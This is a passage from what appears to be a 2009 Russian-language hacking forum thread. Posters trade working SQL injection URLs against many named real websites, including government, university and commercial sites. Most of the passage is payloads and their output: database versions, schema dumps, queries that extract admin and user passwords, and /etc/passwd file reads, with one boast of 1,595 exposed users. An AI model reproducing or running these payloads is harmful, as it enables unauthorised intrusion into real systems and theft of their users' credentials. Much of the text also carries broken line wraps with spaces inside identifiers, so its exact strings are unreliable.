[12]webmasters: webmasters_id,webmasters_name,webmasters_site,webm asters_ip,webmasters_css,webmasters_lang,webmaster s_templates,webmasters_plans_left,webmasters_creat ed
[13]webplans: webplans_id,webplans_owner,webplans_user,webplans_ template,webplans_short,webplans_src,webplans_date
Example:
http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(user s_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemas ol_hema.users--
Strilo4ka
28.11.2009, 23:22
ТИЦ: 50
PR: 4
http://www.billiard.net.ua/documents.php?id=-1474+union+select+1,2,3,4,concat_ws(0x40,user(),da tabase(),version(),@@version_compile_os),6,7,8/*
u_billiard@localhost@billiard@4.1.22-log@pc-linux-gnu
эротический масаж :)
http://nefertiti.net.ua/index.php?p=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--+&id=&lang=eng
.0.22:nefer_vladimir:nefer_vladimir@localhost:unkn own-freebsd6.0
http://nefertiti.net.ua/index.php?p=-1%20union%20select%201,2,GROUP_CONCAT(TABLE_NAME%2 0SEPARATOR%200x40),4,5%20FROM%20information_schema .TABLES%20where%20TABLE_SCHEMA=0x6e656665725f766c6 164696d6972--%20&id=&lang=rus
MENU@category@config@config_cat@item@main
http://nefertiti.net.ua/index.php?p=-1%20union%20select%201,2,GROUP_CONCAT(COLUMN_NAME% 20SEPARATOR%200x40),4,5%20FROM%20information_schem a.COLUMNS%20WHERE%20TABLE_NAME=0x4d454e55--%20&id=&lang=rus
атрибуты
menu:
idmenu@item@mat_id@root_id@por@item_ukr@item_eng@t ype
category:
cat_id@root_cat@name_cat@descr@sh_descr@img@por
config:
name_site@description@adminlogin@adminpass@id@meta
config_cat:
item_per_page@i_shop@email@add_img@money@id
item:
id@id_category@title@description@sh_description@pr ice@hits@money_type@print_to_index@img@ad_img
main:
d@name@info@info_ukr@info_eng
http://www.bizarresoft.ro/produse_detalii.php?produs=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11,12,13,14
Database Version: 5.0.85-community-log
Database name: bizarres_bizarres
User name: bizarres_barabum@localhost
Os : pc-linux-gnu
http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,column_name)+ from+information_schema.columns+where+table_name=0 x7573657273
users::id:user,pass:email:perm
http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user, 0x3a,pass,0x3a,email,0x3a,perm)+from+users
MySQL MySQL 5.0.32-Debian_7etch1-log
================================================== ========
http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name=0x777 05f7573657273
wp_users::�ID,�user_login,�user_pass,�user_nicename,�user_email,�user_url,�user_registered,�user_activation_key,�user_status,�display_name
http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,ID,0x3a,�user_login,0x3a,�user_pass,0x3a,user_email)+from+wp_users
MySQL 5.0.81-community
Strilo4ka
30.11.2009, 02:49
ZAXID.NET
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,concat_ws(0x3a,user(),database() ,version(),@@version_compile_os),3,4,5--+
user:chatzaxid@localhost
DB:chatzaxid
version:5.1.37-log
OS:unknown-linux-gnu
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,%20GROUP_CONCAT(TABLE_NAME),3,4, 5+FROM+information_schema.TABLES+WHERE+TABLE_SCHEM A=0x636861747a61786964--+
нашы таблички:
banerz,banerz_groups,banerz_specials,banners,confd isclaimers,conferences,confusers,qa,urights
атрибуты confusers:
uid,unick,upib,uemail,uicq,uworkplace,uposada,upas s,banned
пользователи:
http://chat.zaxid.net/index.php?action=zvit&cid=-38+union+select+1,GROUP_CONCAT(concat_ws(0x3a,uid, unick,upib,uemail,uicq,uworkplace,uposada,upass,ba nned)+SEPARATOR+0x40),3,4,5+FROM+confusers--+
Всего 1595 пользователя!!!
http://www.medialaw.kz/index.php?r=-1+union+select+concat_ws(version(),database(),user ()),2%20--
------
Strilo4ka
30.11.2009, 22:18
Официальный сайт Южной железной дороги!
вывод в теге <title>
В даному случае скуль в оракле!
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+table_name+from+sys.all_tables--+
таблица AAABBB
Oracle
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+user+from+sys.user_tables--+
пользователь PZ
http://www.pz.gov.ua/dept/dept.php?lid=1&mid=-2511+union+select+tablespace_name+from+sys.user_ta bles--+
PZTAB
пользователи
OUTLN
SYS
DBSNMP
...
таблицы системного пользователя SYS
Dual
AUDIT_ACTIONS
доступ до DBA_USERS для пользователя под которым работает скрипт закрыт.
всесто limit rownum
кавычки екранируються
в запросе в скрыпте один атрибут
склейка так атрибут||chr(симовл асци)||..||..||..
http://aquatoriya.org/news.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6+ from+information_schema.tables--
http://www.photobooth.net/art/index.php?artistID=-21+union+select+1,2,3,4,5,6,7,load_file(0x2F657463 2F706173737764),9--
http://www.cfess.org.br/noticias_res.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12/*
Strilo4ka
02.12.2009, 03:42
http://catalog.arena-bel.ru/index.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5--+&s=0
5.0.87-log:catalogarenabel:catalogarenabel@localhost:port bld-freebsd7.2
partnerstehno_backs@partnerstehno_banners@partners tehno_chapters@partnerstehno_counts@partnerstehno_ cp_clons@partnerstehno_cp_links@partnerstehno_cp_l inkstoclons@partnerstehno_letters@partnerstehno_li nks@partnerstehno_linkstocp@partnerstehno_schedule r@partnerstehno_templates@tehno_backs@tehno_banner s@tehno_chapters@tehno_counts@tehno_cp_clons@tehno _cp_links@tehno_cp_linkstoclons@tehno_letters@tehn o_links@tehno_linkstocp@tehno_scheduler@tehno_temp lates
http://alpha-avizo.com/index.php?page=search&id=B2'&type=3+union+select+1,2,3,4,5,6,7,8,9,10--+
5.0.77:alphaav_bp:alphaav_dhsilabs@localhost:portb ld-freebsd6.4
tables:
category@prop
prop columns:
no@dt@id@org@name@phone@email@typ@txt@conf
category columns:
id@cat@des
http://www.catholiccharitiesdc.org/find/services/index.php?id=-156+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
5.0.77:ccs-dc_org:ccsdc@rh7.axion-it.com:redhat-linux-gnu
таблицы
content@session@user@version_link
атрибуты user
user_id@email@name@password@password_change@passwo rd_forgot_key@password_forgot_key_expire
http://www.geotunis.org/index_en.php?id=-5++union+select+1,2,3,4,5,6,7,8--
http://www.alfajer.com/company_details.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10--
http://www.huesler-nest.ch/en/news.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
5.0.32-Debian
huesler@localhost
http://www.esoterica.ru/news.php?id=-22+union+select+1,2,3,4,5--
ТИЦ 170.
http://tdes.nnov.ru/thumbnails.php?id=-980+union+select+1,2,3,4,5,6,7,8,9,0,1,2,table_nam e,4,5+from+information_schema.tables+limit+19,1%20--&page=0
DezMond™
04.12.2009, 13:11
http://www.sanfordwomenshealth.org/staff/index.php?id=&entryid=-3+union+select+1,2,3,4,5,6,7,table_name,9,10+from+ information_schema.tables+/*+
http://www.trailking.com/news/index.php?newsid=-2+union+select+1,2,3,4,5,6,7,8,9+--+
http://www.ve4erina.ru/services/index.php?n=-3+union+select+1,user()+--+&id=27
http://www.computertoday.net/magazine.php?mag=WinMag&mag_no=-166+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3 a3a,username,password,email))),7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25+from+phpuserlog in_users+/*+&backyear=2007'
http://www.hydrix.com/services/index.php?id=27+union+select+1,2,3,4,5,6,7,8,9+--+
nemaniak
04.12.2009, 18:34
barrettos.info
http://www.barrettos.info/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,1,1,1,1,concat_ws(0x3a,id,use rtype,username,password),1,1,1,1,1,1,1,1+from+jos_ users+--
5.1.30:barrett2_jo151@localhost:barrett2_jo151
hilsonmoormanfamily.com
http://www.hilsonmoormanfamily.com/login/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,version%28%29,1,1,1,concat%28 username,0x3a,password%29,1,1,1,1,1,1,1,1+from+jos _users--
5.0.81-community:hilsonm1_jo151@localhost:hilsonm1_jo151
[+]Printable field: 2
[+]Vuln URL: http://gpsgsm.ru/txt.php?id=200+and+0+UNION+SELECT+1,2,3,4--
[+]MySQL Info: gpsgsm@fhe.hoster.ru:4.0.27-log:gpsgsm:binjportbld-freebsd7.0
----------------------------
http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9+from+information_schema.tables--
смотрим колонки в таблице wp_users
http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9+from +information_schema.columns+where+table_name=0x777 05F7573657273--
ещё еда:
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2F6574632F7061737377 64),3,4,5--
http://mtucrt.students.mtu.edu/index.php?id=-12+union+select+1,concat_ws(user(),database()%20,v ersion(),@@version_compile_os),3,4,5,6,7--
хорошенький сайт)
http://www.modifiedstreetcars.com/girls.php?Hot%20Girl%20on%20Peugeot%20Bonnet&id=-100+union+select+1,2,3,unhex%28hex%28group_concat% 280x3a,member_id,0x3a,username,0x3a,password,0x3a, email%29%29%29,5,6,7,8,9+from+members--
http://www.ctclchina.com/news.php?aid=-45+union+select+1,2,3,concat_ws(0x3a,user,0x3a,pas sword,0x3a,file_priv),5,6,7,8,9+from+mysql.user
root:::[censored]:::Y
MySQL 5.0.51a-3ubuntu5.1
http://www.ctclchina.com/news.php?aid=-45+union+select+1,2,3,load_file(0x2F6574632F706173 737764),5,6,7,8,9 - чтение файлов на сервере (/etc/passwd)
fox_malder
06.12.2009, 15:18
http://chobags.us/products.php?id=-72+and+0+union+select+1,2,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),4,5,6,7,8 +--+&type=products
4.1.22-max-log
4bag4new
4bag4new@208.109.181.10
unknown-linux-gnu
GrAmOzEkA
06.12.2009, 19:19
http://www.coyc.ru/sauce.php?sid=-6+union+select+1,2,3,database()--
u76689_coyc
http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(table_name)+FROM +information_schema.tables+WHERE+table_schema=0x75 37363638395F636F7963--
accounts 0x6163636F756E7473
domains
forum_forums
forum_mailer
forum_messages
forum_sessions
indexes
sauces
types
users 0x7573657273
http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(column_name)+FRO M+information_schema.columns+WHERE+table_schema=0x 7537363638395F636F7963+AND+table_name=0x6163636F75 6E7473--
login,passw,id,nick,email,foto,path,data_reg,hash, enable,podp
http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(column_name)+FRO M+information_schema.columns+WHERE+table_schema=0x 7537363638395F636F7963+AND+table_name=0x7573657273--
uid,login,pass,name,surname,email,is_publish,url,b irthday,city,info,ulevel
Heavy Metal
06.12.2009, 21:48
sweb, постом
http://www.tests-tests.com/bio.php?question=0234232653314114344433&qcur=4&qnum=-1 union select version()/*
http://www.tayloralden.com/news.php?id=-13+union+select+1,group_concat(table_name),3,4,5,6 ,7,8+from+information_schema.tables--
http://www.almaz-antey.ru/news.php?id=-13+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10,11,12+from+information_schema.tables--
fox_malder
07.12.2009, 21:11
http://docksr.us/en/nieuws.php?id=56+and+0+union+select+1,2,id,login,p assword,6,7,8+from+users+--+
nemaniak
08.12.2009, 01:05
bpbux.info
http://bpbux.info/forum/main_forum.php?cat=-1+Union+ALL+Select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7--
5.0.32-Debian_7etch5~bpo31+1-log:jbarros_gen5@supremecenter103.com:jbarros_gen5
woobux.com
http://www.woobux.com/forum/main_forum.php?cat=-1+Union+ALL+Select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7--
5.0.85-community:woobuxco_ptc@localhost:woobuxco_ptc
-1-
target : http://www.stanadyne.com
Exploit: http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,null,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Database : stacms
User : stacms@97.74.24.95
Version : 5.0.67.d7-ourdelta-log
Contain :
[0]SSI_Customers: CustomerID,CustomerName,Abbriv
[1]SSI_GroupParts: ID,Group,PartNo,Quantity,X,Y,OnLine,IndentFlag,Col or
[2]SSI_GroupTypes: ID,Description
[3]SSI_Groups: ID,GroupID,PartNo,Quantity,X,Y,Indent,Note,GroupTy pe
[4]SSI_MasterPart: ID,PartNo,Description,Superceded
[5]SSI_Model: ID,Model,StanadynePN,CustomerID,CustomerPN,Engine, Application,Edition,ECN,Dated,Reman
[6]SSI_Model1: Model,StanadynePN,CustomerID,CustomerPN,Engine,App lication,Edition,ECN,Dated,Reman
[7]SSI_ModelAssemblys: ID,Model,Assembly
[8]SSI_ModelEditions: ID,Model,Edition,ECN,EditionDate
[9]SSI_ModelGroups: ID,Model,Group,Page,Position,GroupType
[10]SSI_Parts: PartNo,Description,Notes,Superseded,SA,PartNoDesc, AssemblyNo
[11]SSI_Parts1: PartNo,Description,Notes,Superseded
[12]SSI_RawServLit: ID,Type,Literature,Revision,SUBJECT,CUSTOMER,Model
[13]SSI_RawSubject: SUBJECT,RELATED,RELATED,RELATED
[14]SSI_RawXref: Model,Service,Parts,Service
[15]SSI_ServiceAssemblys: Assembly,Description
[16]SSI_SupersededParts: RecordID,PartNo,SupersededBy
.......
Example:
http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,Custome rName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +from+SSI_Customers--
-2-
target : http://www.thedinah.com
Exploit: http://www.thedinah.com/votes/vote.php?id=7+AND+1=2+UNION+SELECT+0,null,2,3,4--
Database : thedi36_thedinah
User : thedi36_mariahus@localhost
Version : 5.0.81-community
Contain :
[0]td_adcontainer: ncontainerid,sname,sgroup,ssubgroup
[1]td_admin: slogin,spwd,ssmtpserver,ssmtpuserid,ssmtppwd,sfrom emailid,bapprovecomments,simagebordercolor,simageb orderwidth,svideobgcolor,bhidepreviewinbrowsemedia ,sbackgroundcolor,sbackgroundimage,busebackgroundi mage
[2]td_ads: nadid,simageurl,slinkurl,nmaximpressions,ncurrimpr essions,dcreatedon,nclicks,nwidth,nheight,nadconta iner,salternatetext,sscript
[3]td_album: nalbumid,sname,dcreated
[4]td_article: narticleid,nsectionid,dcreated,dmodified,dpublishe d,ncreatedby,nmodifiedby,stitle,ssummary,sbody,bal lowcomments,bapproveforpub,ballowrss,nweight,nview s,barchive,skeywords,nthumbnail,nheadingthumbnail
[5]td_articleads: nlinkid,narticleid,nadid,nposition
[6]td_articlemedia: nlinkid,narticleid,nmediaid,nposition
[7]td_comment: ncommentid,narticleid,nuserid,dpostedon,sbody,snam e,bapproved,napprovedby
[8]td_editors: neditorid,spwd,ddate,sname,bdisabled,simagefile,ba ddtolist,suserid,bownarticles,botherarticles,bownp ublish,botherpublish,bownedit,botheredit,bownmedia ,bothermedia,badmanager,bcategories,bowncomments,b othercomments,bhomepage,semail,bsignups,sinfo,bpho toalbum,nsort
[9]td_homepage: nthumbheight,nthumbwidth,nthumbwhatsupheight,nthum bwhatsupwidth,nrecentnewsitems,nwhatsuparticle,nla testmembers,nlatestblogs,nlatestvlogs,smainbtn1tex t,smainbtn2text,smainbtn3text,smainbtn4text,smainb tn5text,smainbtn1link,smainbtn2link,smainbtn3link, smainbtn5link,smainbtn4link,nrecentnewscat,swhatsu ptitle,srecentnewstitle,srecentblogstitle,sleftbar graphic,nhomepagearticle
[10]td_media: nmediaid,ntype,sfilename,scaption,skeywords,nwidth ,nheight,dcreatedon,naddedby,sthumbnail
[11]td_menu: nentryid,nsequence,nlevel,stext,surl,nparentid,nch ild
[12]td_pgroup: ngroupid,nalbumid,dcreated,sname
[13]td_photo: nphotoid,scaption,dcreated,sby,ngroupid,sfilename
[14]td_poll: npollid,bactive,squestion,soption1,soption2,soptio n3,soption4,soption5,nvotes1,nvotes2,nvotes3,nvote s4,nvotes5
[15]td_section: nsectionid,nparentsection,sname,sdescription
[16]td_subscribe: nid,semailid,ddate,bremove
[17]td_user: nuserid,susername,suserpwd,sfullname,semail,dsignu p,sactivationkey,spwdrecoverykey,bdisabled,simagef ile,slocation,scity,scountry
[18]td_vote: nvoteid,stitle,smatter,dcreated,nclosed
[19]td_votev: nlinkid,nvoteid,nmediaid,nvotes,nposition
[20]td_voting: nvoteid,nmemberid,dvote,nmediaid
Example:
http://www.thedinah.com/votes/vote.php?id=7+AND+1=2+UNION+SELECT+0,concat(slogin ,0x3a,spwd),2,3,4+from+td_admin--
-3-
target : http://eco.creditbank.co.kr/
Exploit: http://eco.creditbank.co.kr/dir.php?id=44+AND+1=2+UNION+SELECT+0,1,2,3,null,5, 6,7,8,9,10--
Databases :
eco
mysql
test (empty)
User : eco@203.234.219.196
Version : 5.0.51b
Contain (eco) :
[0]zase_bbs_incruit_article: no,site_no,site_name,title,content,url,written,che cksum_no,indexed,regdate
[1]zase_bbs_incruit_checksum: no,prefix,suffix
[2]zase_bbs_notice_article: no,site_no,site_name,title,content,url,written,che cksum_no,indexed,regdate
[3]zase_bbs_notice_checksum: no,prefix,suffix
[4]zase_company_basic: no,bookcode_code1,bookcode_upchecd,bookcode_upjo_k ey,bookcode_upjo_name,bookcode_upname,bookcode_eng _name,sang1_homepage,sang1_addr_kor,sang1_tel,sang 1_intro,sang2_estab_date,sang2_list_date,sang2_old _upche,sang2_employee_low,sang2_rptv_kor,sang3_juj u_name1,sang3_juju_name2,sang3_juju_name3,sang3_sa le_name1,sang3_sale_name2,sang3_sale_name3,sang3_c urr_sale1,sang3_curr_sale2,sang3_curr_sale3,sang3_ profit_name1,sang3_profit_name2,sang3_profit_name3 ,sang3_profit_name4,sang3_curr_profit1,sang3_curr_ profit2,sang3_curr_profit3,sang3_curr_profit4,sang 3_export_ratio,sang2_inspect_corp,sang25_normal_st ,sang25_first_st,sang25_foreign,sang1_face_value,s ang2_fs_month,sang1_market_seg,regdate
[5]zase_company_eva_new: stockcd,year1,year2,year3,year4,noplat1,noplat2,no plat3,noplat4,ic1,ic2,ic3,ic4,roic1,roic2,roic3,ro ic4,wacc1,wacc2,wacc3,wacc4,eva1,eva2,eva3,eva4
[6]zase_company_sang04: stockcd,s0,s1,s2,s3,s4,s5_0,s5,s6,s7,s8,s9_0,s9,s1 0,s11,s12,s13_0,s13,s14,s15,s16,s49_0,s49,s50,s51, s52,s17_0,s17,s18,s19,s20,s29_0,s29,s30,s31,s32,s3 3_0,s33,s34,s35,s36,s57_0,s57,s58,s59,s60,s61_0,s6 1,s62,s63,s64,s45_0,s45,s46,s47,s48,s53_0,s53,s54, s55,s56
[7]zase_company_sang05: stockcd,bs1,bs2,bs3,bs4,bs5,bs6,bs7,bs8,bs9,bs10,b s11,bs12,bs13,bs14,bs15,bs16,bs17,bs18,bs19,bs20,b s21,bs22,bs23,bs24,bs25,bs26,bs27,bs28,bs29,bs30,b s31,bs32,bs33,bs34,bs35,bs36,bs37,bs38,bs39,bs40,b s41,bs42,bs43,bs44,bs45,bs46,bs47,bs48,bs49,bs50,b s51,bs52,bs53,bs54,bs55
[8]zase_company_sang06: stockcd,pl1,pl2,pl3,pl4,pl5,pl6,pl7,pl8,pl9,pl10,p l11,pl12,pl13,pl14,pl15,pl16,pl17,pl18,pl19,pl20,p l21,pl22,pl23,pl24,pl25,pl26,pl27,pl28,pl29,pl30,p l31,pl32,pl33,pl34,pl35,pl36,pl37,pl38,pl39,pl40,p l41,pl42,pl43,pl44,pl45,pl46,pl47,pl48,pl49,pl50,p l51,pl52,pl53,pl54,pl55,pl56,pl57,pl58,pl59,pl60,p l61,pl62,pl63,pl64,pl65,pl66,pl67,pl68,pl69,pl70,p l71,pl72,pl73,pl74,pl75,pl76,pl77,pl78,pl79,pl80
[9]zase_company_sang07: stockcd,rt1,rt2,rt3,rt4,rt5,rt6,rt7,rt8,rt9,rt10,r t11,rt12,rt13,rt14,rt15,rt16,rt17,rt18,rt19,rt20,r t21,rt22,rt23,rt24,rt25,rt26,rt27,rt28,rt29,rt30,r t31,rt32,rt33,rt34,rt35,rt36
[10]zase_company_sang28: stockcd,sale_incre1,sale_incre2,roe1,roe2,rt1,rt2, eps1,eps2
[11]zase_company_sang37_beta: stockcd,date1,date2,beta11,beta12,beta13,vola11,vo la12,vola13,beta21,beta22,beta23,vola21,vola22,vol a23
[12]zase_company_sang401: stockcd,title,wongo10,wongo20,wongo30
[13]zase_company_sang402: stockcd,title,wongo1,wongo2,wongo3
[14]zase_company_temp: no,bookcode_code1,bookcode_upname,sang1_homepage,o noff,regdate
[15]zase_company_tmp_basic: no,bookcode_code1,bookcode_upchecd,bookcode_upjo_k ey,bookcode_upjo_name,bookcode_upname,bookcode_eng _name,sang1_homepage,sang1_addr_kor,sang1_tel,sang 1_intro,sang2_estab_date,sang2_list_date,sang2_old _upche,sang2_employee_low,sang2_rptv_kor,sang3_juj u_name1,sang3_juju_name2,sang3_juju_name3,sang3_sa le_name1,sang3_sale_name2,sang3_sale_name3,sang3_c urr_sale1,sang3_curr_sale2,sang3_curr_sale3,sang3_ profit_name1,sang3_profit_name2,sang3_profit_name3 ,sang3_profit_name4,sang3_curr_profit1,sang3_curr_ profit2,sang3_curr_profit3,sang3_curr_profit4,sang 3_export_ratio,sang2_inspect_corp,sang25_normal_st ,sang25_first_st,sang25_foreign,sang1_face_value,s ang2_fs_month,sang1_market_seg,regdate
[16]zase_company_tmp_eva_new: stockcd,year1,year2,year3,year4,noplat1,noplat2,no plat3,noplat4,ic1,ic2,ic3,ic4,roic1,roic2,roic3,ro ic4,wacc1,wacc2,wacc3,wacc4,eva1,eva2,eva3,eva4
[17]zase_company_tmp_sang04: stockcd,s0,s1,s2,s3,s4,s5_0,s5,s6,s7,s8,s9_0,s9,s1 0,s11,s12,s13_0,s13,s14,s15,s16,s49_0,s49,s50,s51, s52,s17_0,s17,s18,s19,s20,s29_0,s29,s30,s31,s32,s3 3_0,s33,s34,s35,s36,s57_0,s57,s58,s59,s60,s61_0,s6 1,s62,s63,s64,s45_0,s45,s46,s47,s48,s53_0,s53,s54, s55,s56
[18]zase_company_tmp_sang05: stockcd,bs1,bs2,bs3,bs4,bs5,bs6,bs7,bs8,bs9,bs10,b s11,bs12,bs13,bs14,bs15,bs16,bs17,bs18,bs19,bs20,b s21,bs22,bs23,bs24,bs25
Contain (mysql) :
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Colu mn_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,D elete_priv,Create_priv,Drop_priv,Grant_priv,Refere nces_priv,Index_priv,Alter_priv,Create_tmp_table_p riv,Lock_tables_priv,Create_view_priv,Show_view_pr iv,Create_routine_priv,Alter_routine_priv,Execute_ priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,ex ample,url
[7]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,D elete_priv,Create_priv,Drop_priv,Grant_priv,Refere nces_priv,Index_priv,Alter_priv,Create_tmp_table_p riv,Lock_tables_priv,Create_view_priv,Show_view_pr iv,Create_routine_priv,Alter_routine_priv,Execute_ priv
[8]func: name,ret,dl,type
[9]help_category: help_category_id,name,parent_category_id,url
[10]help_keyword: help_keyword_id,name
[11]help_relation: help_topic_id,help_keyword_id
[12]help_topic: help_topic_id,name,help_category_id,description,ex ample,url
[13]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete _priv,Create_priv,Drop_priv,Grant_priv,References_ priv,Index_priv,Alter_priv,Create_tmp_table_priv,L ock_tables_priv,Create_view_priv,Show_view_priv,Cr eate_routine_priv
Example:
http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(user s_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemas ol_hema.users--
edu
http://construct.edu.ru/news.php?id=-56+union+select+1,2,group_concat(0x0b,column_name) ,4,5,6,7,8+from+information_schema.columns+where+t able_name=0x6262665f7573657273
(phpBB) bbf_users::id,username,user_password
http://construct.edu.ru/news.php?id=-56+union+select+1,2,concat_ws(0x3a,user_id,0x3a,us ername,0x3a,user_password),4,5,6,7,8+from+bbf_user s+limit+1,1 Administrator
логинилка в форумах
MySQL 5.1.39-log
Strilo4ka
09.12.2009, 05:14
http://www.med-tech.com.ua/index.php?mod=mobfirms&id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,concat_ws(0x3a,version(),database(),user()),16 ,17,18,19,20--+
версия БД:4.0.13:
БД:user_medtech2:
пользователь:medtech2@localhost
http://www.pilot-film.com/index.php?p=show_person&pid=8831+union+select+1,2,concat_ws(0x3a,convert(v ersion()+using+cp1251),convert(user()+using+cp1251 ),convert(database()+using+cp1251),convert(@@versi on_compile_os+using+cp1251)),4,5,6,7,8,9,10--+
версия:4.1.18-log
пользователь:pilot@localhost
БД:pilot
ОС:portbld-freebsd6.1
http://slideshow.com.ua/ru/view.php?id=-000963+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a ,version(),database(),user(),@@version_compile_os)--+
версия:5.0.87-community-log
БД:slidesho_slideshow
пользователь:slidesho@localhost
ОС:unknown-linux-gnu
http://slideshow.com.ua/ru/view.php?id=-000963+union+select+1,2,3,4,5,6,7,8,group_concat(u nhex(hex(TABLE_NAME))%20separator%200x40)FROM%20in formation_schema.TABLES+WHERE%20TABLE_SCHEMA=0x736 c69646573686f5f736c69646573686f77--+
gallery@slideshow
------------------------------>
http://www.steelprom.com/articleview.php?id=-62+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),8,9,10--+
версия:5.0.22
БД:urka200022_steel
пользователь:son3@localhost
ОС:redhat-linux-gnu
DB:
information_schema@test_del@urka200022_stee
tables:
aallcontr@aallservices@aanekdots@aboard@acontract@ adish@adistr@aevents@afiles@ajob@akitchen@amenukin dname@anews@article@aservices@astatistuser@atypuse r@auserdishtype@ausers@avisitors@avoting@board@boa rd2@category@communication@du_client@du_filedl@du_ forumb@du_forumt@du_news@du_passw@du_sendpost@du_u sprog@favcatnews@favcatprod@favprod@files@login@ne ws@newsgroup@product@searchplacelist@searchword@se archwplace@stoplist@tablelist@testtable@topic@user s@webclient
атрибуты webclient:
id@user_id@dt_zakaz@diam@sten@mar_st@zakazano@srok _post@otgruzh@vagon@dt_vagon@sklad_nik@sklad_st@dt _prokat@typ@is_close@dt_close
атрибуты users:
d@login@passwd@name@first_name@typ@is_locked@e_mai l@phone@fax@dt_created@dt_locked@sms@txt@handy@com munication_id@country
атрибуты ausers:
id@login@passwd@name@name_boss@name_man@typ_id@kit chen_id@timework@logo_id@adress@extadress@phone@e_ mail@http@distr_id@map_id@descr@viewfoto@namefoto@ sizefoto@foto_size_y@discount@is_locked
атрибуты login:
d_login@login@password@status
атрибуты du_passw:
id@iduser@identkod@sdate
атрибуты du_client:
id@login@passw@email@lico@firma@licenz@prg_c@prg_v @prg_z
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,GROUP_CONCAT(concat_ ws(0x3a,login,password,status)%20separator%200x32) %20,8,9,10+FROM+login--+
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,group_concat(unhex(h ex(login))%20separator%200x40),8,9,10+FROM+ausers--+
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,group_concat(concat_ ws(0x3a,unhex(hex(login)),unhex(hex(passwd)),unhex (hex(phone)),unhex(hex(e_mail)))%20separator%200x4 0),8,9,10+FROM+users--+
PostgreSQL
http://odessa-vecher.com/restaurantse.php?id=-19+union+select+null,null,null,version(),current_u ser(),null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null--+&action=view
version:5.0.81-community-log
user:odessave_boltik@localhost
http://www.arsenal.com.ua/news.php?id=138+union+select+concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),2,3,4, 5,6,7--+
версия:4.1.22-log
БД:arsenalu
пользователь:u_arsenalu@localhost
ОС:pc-linux-gnu
http://www.lcci.com.ua/opennews.php?id=-339+union%20+select+1,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),3/*
версия:4.1.22-log
БД:lcci
пользователь:lcci@localhost
ОС:unknown-freebsd6.2
-1-
Target : http://www.freestyleagency.eu
Exploit:http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23--
Database : freestyl_freestyle
User : freestyl_agency@localhost
Version : 5.0.85-community-log
Contain :
[0]admin: IdAdmin,UserAdmin,PassAdmin,EmailAdmin,StatusAdmin
